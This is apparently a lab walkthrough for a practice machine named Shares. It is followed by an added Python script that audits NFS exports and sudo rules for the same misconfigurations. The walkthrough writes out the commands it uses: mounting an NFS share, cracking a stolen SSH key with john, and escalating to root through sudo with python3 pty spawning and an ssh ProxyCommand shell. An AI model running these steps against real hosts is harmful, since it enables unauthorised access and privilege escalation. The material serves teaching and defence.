172.31.1.7
CyberSec Labs Shares Walkthrough.
As the name itself suggests, it has an NFS share open.

It looks like /home/amir can be mounted on our machine.
Using mount -t nfs 172.31.1.7:/home/amir /tmp/shares/ we mount the amir share on our machine's /tmp/shares/ folder.

Going to the shares folder, we find a .ssh folder and an id_rsa.bak file for user amir.


Great, so we can use ssh2john and then john to crack the passphrase for this id_rsa.bak.


But in the normal nmap scan we couldn't find an SSH port, maybe because it was running on a higher port.
We can use nmap automator to scan all the higher ports quickly.

So SSH is running on port 27853 (sweet!)
ssh -i id_rsa -p 27853 amir@172.31.1.7 and we get a shell.

Priv Esc
Running sudo -l, we get that user amy can run python3 as root, so:
sudo -u amy /usr/bin/python3 -c "import pty;pty.spawn('/bin/bash')"
And we are logged in as user amy.

Again, running sudo -l as user amy, we come to know that user amy can run ssh as root.

Easy, use the ssh entry from GTFOBins with sudo and you're root 😛
sudo /usr/bin/ssh -o ProxyCommand=';bash 0<&2 1>&2' x
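
From the defender's side, the three settings this box chained together (a home directory exported over NFS, and sudo rules for python3 and ssh) can be caught with a small audit. The script below is an added example, not part of the original walkthrough; the sample /etc/exports and sudo -l text, the export options, the hostname "shares" and the SHELL_CAPABLE list are constructed assumptions.

```python
import re

# Programs that hand out a shell when allowed through sudo. python3 and ssh are
# the two from this walkthrough; the rest of the list is an assumption to extend.
SHELL_CAPABLE = {"python", "python3", "ssh", "perl", "ruby", "bash", "sh", "vim", "find"}

def audit_exports(text):
    """Flag /etc/exports entries that offer a home directory to any client."""
    findings = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        path, *clients = line.split()
        for client in clients or ["*"]:          # no client listed means everyone
            host = client.split("(", 1)[0] or "*"
            if host == "*" and re.match(r"/(home|root)(/|$)", path):
                findings.append(f"{path}: home directory exported to every host")
    return findings

def audit_sudo_l(text):
    """Flag `sudo -l` rules that allow a shell-capable program or ALL."""
    findings = []
    for line in text.splitlines():
        m = re.match(r"\s*\(([^)]*)\)\s*(.*)", line)
        if not m:
            continue                              # header and Defaults lines
        runas = m.group(1).strip()
        spec = re.sub(r"\b[A-Z_]+:\s*", "", m.group(2))   # drop NOPASSWD: etc.
        for cmd in filter(None, (c.strip() for c in spec.split(","))):
            name = cmd.split()[0].rsplit("/", 1)[-1]
            if name == "ALL" or name in SHELL_CAPABLE:
                findings.append(f"run as {runas}: {cmd} gives a shell as that user")
    return findings

# Constructed sample input modelled on the lab in this walkthrough.
EXPORTS = "/home/amir *(rw,sync)\n/srv/backup 10.0.0.5(ro,root_squash)\n"
SUDO_AMIR = ("User amir may run the following commands on shares:\n"
             "    (amy) NOPASSWD: /usr/bin/python3\n")
SUDO_AMY = ("User amy may run the following commands on shares:\n"
            "    (root) NOPASSWD: /usr/bin/ssh, /usr/bin/whoami\n")

if __name__ == "__main__":
    for finding in audit_exports(EXPORTS) + audit_sudo_l(SUDO_AMIR) + audit_sudo_l(SUDO_AMY):
        print(finding)
```

On a real host, feed it the contents of /etc/exports and the output of sudo -l for each account; restricting the export to named clients and removing interpreter and ssh entries from sudoers clears the findings.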

Flags


Author
Sentinal920